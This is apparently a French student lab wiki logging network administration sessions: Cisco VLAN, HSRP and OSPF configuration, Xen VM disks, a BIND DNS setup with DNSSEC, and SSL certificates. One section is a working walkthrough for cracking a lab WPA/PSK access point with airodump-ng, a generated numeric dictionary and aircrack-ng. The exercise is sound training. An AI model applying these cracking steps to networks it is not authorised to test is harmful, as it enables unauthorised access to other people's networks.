  https_proxy=&amp;quot;https://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
  xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.pw &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
